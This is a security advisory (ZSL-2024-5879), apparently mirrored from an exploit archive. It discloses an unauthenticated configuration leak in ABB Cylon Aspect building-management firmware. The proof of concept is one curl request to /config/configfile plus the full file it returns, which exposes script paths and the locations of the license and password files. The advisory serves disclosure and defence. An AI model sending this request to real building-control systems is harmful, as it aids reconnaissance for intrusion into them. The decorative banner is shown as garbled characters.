Share
## https://sploitus.com/exploit?id=ZSL-2024-5879
<html><body><p>ABB Cylon Aspect 3.08.02 Unauthenticated Configuration Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS system suffers from an unauthenticated
configuration disclosure vulnerability. This can be exploited to retrieve
sensitive configuration data, including file paths, environment settings,
and the location of system scripts. These exposed configuration files may
allow an attacker to gain insights into the system's structure, facilitating
further attacks or unauthorized access.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5879
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5879.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ
$ curl http://192.168.73.31/config/configfile
# aliases
SUDO=sudo
# Linux abs paths
INIT=/etc/init.d/
LOGFILE=/var/log/MIX.log
NTP=/etc/ntp.conf
PORTQUEUE=/proc/BACnet/
SYSTEM=/var/log/messages
# Aspect aam paths
# bin
LICENSESTATUS=/usr/local/aam/bin/verifylicense.sh
MIXSH=/usr/local/aam/bin/reconfigureMix.sh
SHELL=/usr/local/aam/bin/
SYSLOGSCRIPT=/usr/local/aam/bin/syslog.sh
GET_TIMEZONE=/usr/local/aam/bin/get-timezone.sh
TIMEZONE=/usr/local/aam/bin/set-timezone.sh
# etc
BACNET=/usr/local/aam/etc/bacnet.conf
BBMD=/usr/local/aam/etc/bdt.txt
DEVICELABEL=/usr/local/aam/etc/deviceLabel
ETHERNET=/usr/local/aam/etc/eth
LICENSE=/usr/local/aam/etc/license.txt
MIXCONF=/usr/local/aam/etc/mixconf.txt
MSTP=/usr/local/aam/etc/mstp
PORTCONFIG=/usr/local/aam/etc/ports.txt
PUP=/usr/local/aam/etc/pupconf.txt
SERIAL=/usr/local/aam/etc/serial.txt
SYSLOGCFG=/usr/local/aam/etc/syslog.txt
TIMESYNC=/usr/local/aam/etc/device.txt
WEBSERVER=/usr/local/aam/etc/web
# var
DEVICEAUTO=/usr/local/aam/var/device-list-
# instance abs paths
CALENDAR=/home/MIX_CMIX/htmlroot/calendar/
INSTANCEHTML=/home/MIX_CMIX/htmlroot/
MIX=/home/MIX_CMIX/mix.properties
PERSIST=/home/MIX_CMIX/persist/
PROJECTLOCATION=/home/MIX_CMIX/htmlroot/mix/
SCHEDULE=/home/MIX_CMIX/calendar-password
INSTANCE_VERSION=/home/MIX_CMIX/htmlroot/runtime/release.properties # FIXME new
# mix abs paths
CRITICAL=/var/log/MIXErrors.log
VERSION=/home/MIX_CMIX/htmlroot/runtime/release.properties
# relative paths
PROJECTRETRIEVAL=mix/VIBProject.zip
TIME=config/timeformat
# nexus/max only
MODEMCMD=/usr/local/aam/bin/modem.sh
TTY=
PPPUSERS=/usr/local/aam/etc/pppusers.txt
PPPSCRIPT=/usr/local/aam/bin/pppusers.sh
</p></body></html>